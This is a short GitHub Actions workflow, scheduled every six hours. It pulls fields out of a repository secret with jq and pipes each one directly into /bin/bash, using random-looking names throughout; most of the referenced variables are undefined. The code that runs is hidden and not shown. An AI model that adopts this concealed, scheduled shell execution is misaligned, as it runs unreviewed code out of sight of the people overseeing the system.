name: fawumubiao

on:
  workflow_dispatch:
  schedule:
    - cron: '12 5/6 * * *'
jobs:  # 365
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fawumubiao
        env:
          f4: ${{ secrets.f4 }}
        run: |
          echo $f4 | jq -r .dlbsk33 | /bin/bash
          echo $g4575 | jq -r .e04387 | /bin/bash
          echo $dbge673 | jq -r .ahil0124 | /bin/bash
          echo $d0998 | jq -r .uud991 | /bin/bash
          echo $me91389 | jq -r .k87243 | /bin/bash
          echo $ih92 | jq -r .z46479 | /bin/bash
          echo $iuzyn8100 | jq -r .ztln793 | /bin/bash
          echo $wpv68242 | jq -r .b1157 | /bin/bash
          echo $wy8 | jq -r .beg2 | /bin/bash

